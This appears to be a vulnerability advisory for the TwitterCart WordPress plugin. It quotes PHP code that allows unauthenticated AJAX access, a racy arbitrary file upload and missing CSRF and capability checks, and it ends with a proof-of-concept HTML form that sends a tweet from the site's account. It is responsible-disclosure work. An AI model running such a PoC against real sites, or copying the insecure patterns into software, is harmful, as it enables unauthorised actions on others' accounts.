In not the best sign of the security of WordPress plugins, we have repeatedly found other vulnerabilities while looking into possible vulnerabilities through proactive monitoring of changes made to plugins to try to catch serious vulnerabilities. That was the case with the plugin TwitterCart.

In the function simple_tweet() we noticed code that could possible allow for an arbitrary file upload vulnerability (in the file /includes/twitter.php):

731
732
733

$path = TC_PLUGIN_PATH . $_FILES['file']['name'];
 
move_uploaded_file($_FILES['file']['tmp_name'], $path);

We traced back how the code could be accessed and it looked like anyone could access it. But when we tried to exploit the vulnerability we found that the file wasn’t being saved to the filesystem. The reason for that turned out to be that several lines later in the code the file would be removed:

745

unlink($path);

So unless you could cause an error to occur before that happens the file would be uploaded and almost immediately removed. You might be able to request the uploaded file before it could be removed. That might qualify this issue as a possible vulnerability.

But there seemed to be a more serious issue in the plugin based on where the upload code was located. The function simple_tweet() sends out a tweet, so that seemed to indicate that anyone could also send a tweet from the websites Twitter account through the plugin, which we then confirmed.

There were several security issues at play that caused this. First the plugin allowed even those not logged in to access another function tc_new_tweet() through WordPress’ AJAX functionality (in the file /includes/actions.php):

44
45

add_action('wp_ajax_tc_new_tweet', 'tc_new_tweet');
add_action('wp_ajax_nopriv_tc_new_tweet', 'tc_new_tweet');

That function called the simple_tweet() function without doing a capabilities check to make sure the attempt to send is from someone that should be able to do that or check for a valid nonce to prevent cross-site request forgery (CSRF), which could allow an attacker to cause someone that should be able to send a tweet to send one they didn’t intended to (in the file /includes/functions.php):

394
395
396
397

function tc_new_tweet()
{
    require_once TC_PLUGIN_PATH . 'includes/twitter.php';
    simple_tweet($_POST['msg']);

There were quite a few other AJAX accessible functions that were similarly not secured.

After we notified the developer they released version 2.1, which fixes this vulnerability by removing the code shown above and most of the other AJAX accessible code. For the remaining code things were not fully fixed up. As functions that look like are only intended to be accessed by those logged in are still accessible to those not logged in and there isn’t a capabilities check, but there is protection against CSRF added, which would limit any abuse of those other two items.

Proof of Concept

The following proof of concept will send out a tweet from the website.

Make sure to replace “[path to WordPress]” with the location of WordPress.

<html>
<body>
<form action="https://[path to WordPress]/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="action" value="tc_new_tweet" />
<input type="hidden" name="msg" value="Testing to see if plugin allows anyone to send out tweets through a website." />
<input type="submit" name="submit" value="Submit" />
</form>
</body>
</html>

Timeline

• October 2, 2017 – Developer notified.
• October 2, 2017 – Developer responds.
• October 7, 2017 – Version 2.1 released, which fixes vulnerability.

Concerned About The Security of the Plugins You Use?